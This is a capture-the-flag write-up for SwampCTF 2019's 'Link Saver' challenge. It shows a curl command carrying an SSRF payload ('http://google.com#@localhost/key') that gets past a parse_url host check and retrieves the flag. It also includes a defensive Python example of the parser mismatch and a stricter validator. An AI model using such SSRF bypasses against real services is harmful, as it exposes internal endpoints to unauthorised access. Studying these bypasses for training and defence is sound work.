Tags: swampctf2019
### Problem Description
It's the year 1997 and the Internet is just heating up! :fire:
In order to get ahead of the curve, SIT Industries® has introduced its first Internet product: The Link Saver™. SIT Industries® has been very secretive about this product - even going so far as to hire Kernel Sanders® to test the security!
However, The Kernel discovered that The Link Saver had a little bit of an SSRF problem that allowed any user to fetch the code for The Link Saver™ from https://localhost/key and host it themselves :grimacing:. Fortunately, with a lil' parse_url magic, SIT Industries® PHP wizards have patched this finding from Kernel Sanders® and are keeping the code behind this wonderful site secure!
... or have they? :wink:
-= Created by andrewjkerr =-
- - - -
### Solution
After connecting to the [website](http://chal1.swampctf.com:1244/) of the challenge, we obtain the following page:
![](https://oreoses.github.io/images/2019-4-8-SwampCTF2019/swampctf2019_img1.png)
There was an input field in the page allowing us to send a request to the URL we wanted.
After some tries I noticed that the only accepted URL was _www.google.com_. Taking this into account, I tried injecting _http://google.com#@localhost/key_.
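An added example (not the challenge's code, which this write-up does not show) of the parser disagreement a `#@` URL relies on, next to a check that refuses it. The allow-list, the function names and the "last `@` wins" fetcher model are assumptions made for illustration.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumption: allow-list inferred from the write-up's observation about google.com.
ALLOWED_HOSTS = {"google.com", "www.google.com"}
PAYLOAD = "http://google.com#@localhost/key"  # URL from the write-up


def validator_host(url):
    """Host as an RFC 3986 parser sees it: the authority stops at '/', '?' or '#'."""
    return urlsplit(url).hostname


def lenient_fetcher_host(url):
    """Constructed model of a lenient client: the authority runs to the first '/'
    and everything before its last '@' is treated as userinfo."""
    authority = url.split("://", 1)[1].split("/", 1)[0]
    return authority.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def safe_fetch_target(url):
    """Return a URL rebuilt from validated parts, or None if it must be refused."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError:  # malformed port or IPv6 literal
        return None
    if parts.scheme not in ("http", "https") or host not in ALLOWED_HOSTS:
        return None
    # Userinfo and fragments are not needed for a server-side fetch, and they are
    # exactly where URL parsers disagree, so refuse them outright.
    if "@" in parts.netloc or "#" in url:
        return None
    netloc = host if port is None else f"{host}:{port}"
    # Hand the client only this canonical string, never the raw input.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    for u in (PAYLOAD, "http://www.google.com/search?q=ctf"):  # constructed inputs
        print(u, validator_host(u), lenient_fetcher_host(u), safe_fetch_target(u))
```

The HTTP client should receive only the rebuilt URL and should not follow redirects, since a redirect issued by an allowed host is never seen by this check.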
```
$ curl http://chal1.swampctf.com:1244/ --data "link=http://google.com#@localhost/key"
<html>
<head>
<title>Link Fetcher</title>
</head>
<body>
<h1>The Link Fetcher</h1>
Want to remember cool links? This link fetcher will fetch links and store them for you!
Link added!
Link: http://google.com#@localhost/key
Title: The flag!
Description: flag{y0u_cANn0t_TRU5t_php}
<hr /></body>
```